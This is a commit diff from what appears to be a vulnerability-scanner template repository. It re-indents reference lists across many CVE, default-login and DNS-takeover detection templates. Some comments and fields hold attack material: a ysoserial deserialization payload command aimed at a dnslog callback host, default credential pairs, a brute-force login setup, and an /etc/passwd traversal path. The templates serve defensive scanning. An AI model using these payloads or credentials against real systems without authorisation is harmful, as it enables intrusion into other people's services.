- https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
- https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
- https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
requests:
- payloads:

8
cves/2020/CVE-2020-9490.yaml
View File

@ -7,10 +7,10 @@ info:
author: philippedelteil
tags: cve,cve2020,apache,dos
reference:
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
- https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
- https://nvd.nist.gov/vuln/detail/CVE-2020-9490
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
- https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
- https://nvd.nist.gov/vuln/detail/CVE-2020-9490
requests:
- method: GET

6
cves/2021/CVE-2021-20090.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,lfi,buffalo,firmware,iot
requests:

6
cves/2021/CVE-2021-20091.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:

6
cves/2021/CVE-2021-20092.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:

6
cves/2021/CVE-2021-21307.yaml
View File

@ -6,9 +6,9 @@ info:
severity: critical
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
reference:
- https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-21307
- https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-21307
tags: cve,cve2021,rce,lucee,adobe
requests:

6
cves/2021/CVE-2021-22214.yaml
View File

@ -6,9 +6,9 @@ info:
severity: medium
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oob
requests:

4
cves/2021/CVE-2021-24176.yaml
View File

@ -6,8 +6,8 @@ info:
severity: medium
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
reference:
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
- https://wordpress.org/plugins/jh-404-logger/
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
- https://wordpress.org/plugins/jh-404-logger/
tags: cve,cve2021,wordpress,wp-plugin,xss
requests:

4
cves/2021/CVE-2021-24237.yaml
View File

@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,realteo,xss,wordpress
reference:
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
requests:
- method: GET

6
cves/2021/CVE-2021-24285.yaml
View File

@ -7,9 +7,9 @@ info:
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
tags: cve,cve2021,wordpress,wp-plugin,sqli
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
requests:
- raw:

4
cves/2021/CVE-2021-24316.yaml
View File

@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,mediumish,xss,wordpress
reference:
- https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
- https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
- https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
- https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
requests:
- method: GET

4
cves/2021/CVE-2021-24495.yaml
View File

@ -6,8 +6,8 @@ info:
severity: medium
tags: cve,cve2021,wp-plugin,wordpress,xss
reference:
- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
- https://wordpress.org/plugins/marmoset-viewer/#developers
- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
- https://wordpress.org/plugins/marmoset-viewer/#developers
requests:
- method: GET

4
cves/2021/CVE-2021-25646.yaml
View File

@ -6,8 +6,8 @@ info:
severity: critical
reference: https://paper.seebug.org/1476/
description: |
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
tags: cve,cve2021,apache,rce
requests:

6
cves/2021/CVE-2021-26295.yaml
View File

@ -10,9 +10,9 @@ info:
- https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
# Note:- This is detection template, To perform deserializes do as below
# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
# `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value
# Note:- This is detection template, To perform deserializes do as below
# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
# `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value
requests:
- raw:

4
cves/2021/CVE-2021-26812.yaml
View File

@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,moodle,jitsi,xss
reference:
- https://github.com/udima-university/moodle-mod_jitsi/issues/67
- https://nvd.nist.gov/vuln/detail/CVE-2021-26812
- https://github.com/udima-university/moodle-mod_jitsi/issues/67
- https://nvd.nist.gov/vuln/detail/CVE-2021-26812
requests:
- method: GET

10
cves/2021/CVE-2021-26855.yaml
View File

@ -5,13 +5,13 @@ info:
author: madrobot
severity: critical
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange,oob
reference:
- https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
- https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
requests:
- raw:

4
cves/2021/CVE-2021-27651.yaml
View File

@ -5,8 +5,8 @@ info:
author: idealphase
description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
reference:
- https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-27651
- https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-27651
severity: critical
tags: cve,cve2021,pega,auth-bypass

2
cves/2021/CVE-2021-27850.yaml
View File

@ -7,7 +7,7 @@ info:
author: pdteam
severity: critical
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-27850
- https://nvd.nist.gov/vuln/detail/CVE-2021-27850
tags: cve,cve2021,apache,tapestry
requests:

8
cves/2021/CVE-2021-27905.yaml
View File

@ -7,10 +7,10 @@ info:
tags: cve,cve2021,apache,solr,ssrf
description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
reference:
- https://www.anquanke.com/post/id/238201
- https://ubuntu.com/security/CVE-2021-27905
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
- https://www.anquanke.com/post/id/238201
- https://ubuntu.com/security/CVE-2021-27905
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
requests:
- raw:

4
cves/2021/CVE-2021-28073.yaml
View File

@ -7,8 +7,8 @@ info:
description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2
tags: ntopng,cve,cve2021
reference:
- http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
- https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
- http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
- https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
requests:
- method: GET

2
cves/2021/CVE-2021-28149.yaml
View File

@ -5,7 +5,7 @@ info:
author: gy741
severity: medium
description: |
Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
reference:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28149

4
cves/2021/CVE-2021-29203.yaml
View File

@ -6,8 +6,8 @@ info:
tags: hpe,cve,cve2021,bypass
description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
reference:
- https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203
- https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203
requests:
- raw:

4
cves/2021/CVE-2021-29484.yaml
View File

@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,xss,ghost
reference:
- https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
- https://nvd.nist.gov/vuln/detail/CVE-2021-29484
- https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
- https://nvd.nist.gov/vuln/detail/CVE-2021-29484
requests:
- method: GET

4
cves/2021/CVE-2021-3129.yaml
View File

@ -6,8 +6,8 @@ info:
severity: critical
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
reference:
- https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
- https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
tags: cve,cve2021,laravel,rce
requests:

4
cves/2021/CVE-2021-32820.yaml
View File

@ -5,8 +5,8 @@ info:
author: dhiyaneshDk
severity: medium
reference:
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
tags: cve,cve2021,expressjs,lfi
requests:

4
cves/2021/CVE-2021-3377.yaml
View File

@ -4,8 +4,8 @@ info:
name: Ansi_up XSS
description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
reference:
- https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
- https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik
severity: medium

6
cves/2021/CVE-2021-34473.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
reference:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
tags: cve,cve2021,ssrf,rce,exchange
requests:

4
cves/2021/CVE-2021-35336.yaml
View File

@ -6,8 +6,8 @@ info:
severity: critical
description: Finding the Tieline Admin Panels with default credentials.
reference:
- https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
- https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
tags: cve,cve2021,tieline,default-login
# admin:password

2
cves/2021/CVE-2021-35464.yaml
View File

@ -7,7 +7,7 @@ info:
severity: critical
tags: cve,cve2021,openam,rce,java
reference:
- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
requests:
- method: GET

2
default-logins/alibaba/alibaba-canal-default-password.yaml
View File

@ -13,7 +13,7 @@ requests:
headers:
Content-Type: application/json
body: |
{"username":"admin","password":"123456"}
{"username":"admin","password":"123456"}
matchers-condition: and
matchers:

2
default-logins/gitlab/gitlab-weak-login.yaml
View File

@ -18,7 +18,7 @@ requests:
gitlab_user:
- 1234
- admin
# Enumerate valid user.
# Enumerate valid user.
attack: clusterbomb

6
default-logins/grafana/grafana-default-credential.yaml
View File

@ -9,8 +9,8 @@ info:
- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
- https://github.com/grafana/grafana/issues/14755
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user.
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user.
requests:
@ -42,7 +42,7 @@ requests:
{"user":"admin","password":"§grafana_password§"}
# grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
# grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
matchers-condition: and
matchers:

6
dns/azure-takeover-detection.yaml
View File

@ -8,9 +8,9 @@ info:
reference:
- https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details.
# Update the list with more CNAMEs related to Azure
# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
# Do not report this without claiming the CNAME.
# Update the list with more CNAMEs related to Azure
# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
# Do not report this without claiming the CNAME.
dns:
- name: "{{FQDN}}"

8
dns/detect-dangling-cname.yaml
View File

@ -6,10 +6,10 @@ info:
severity: info
tags: dns,takeover
reference:
- https://securitytrails.com/blog/subdomain-takeover-tips
- https://nominetcyber.com/dangling-dns-is-no-laughing-matter/
- https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f
- https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
- https://securitytrails.com/blog/subdomain-takeover-tips
- https://nominetcyber.com/dangling-dns-is-no-laughing-matter/
- https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f
- https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
dns:
- name: "{{FQDN}}"

4
exposures/apis/wadl-api.yaml
View File

@ -6,8 +6,8 @@ info:
severity: info
tags: exposure,api
reference:
- https://github.com/dwisiswant0/wadl-dumper
- https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/
- https://github.com/dwisiswant0/wadl-dumper
- https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/
requests:
- method: GET

4
exposures/configs/exposed-gitignore.yaml
View File

@ -6,8 +6,8 @@ info:
severity: info
tags: config,git,exposure
reference:
- https://twitter.com/pratiky9967/status/1230001391701086208
- https://www.tenable.com/plugins/was/98595
- https://twitter.com/pratiky9967/status/1230001391701086208
- https://www.tenable.com/plugins/was/98595
requests:
- method: GET

4
exposures/configs/exposed-sharepoint-list.yaml
View File

@ -5,8 +5,8 @@ info:
author: ELSFA7110
severity: low
reference:
- https://hackerone.com/reports/761158
- https://hackerone.com/reports/300539
- https://hackerone.com/reports/761158
- https://hackerone.com/reports/300539
tags: config,exposure,sharepoint
requests:

Some files were not shown because too many files have changed in this diff Show More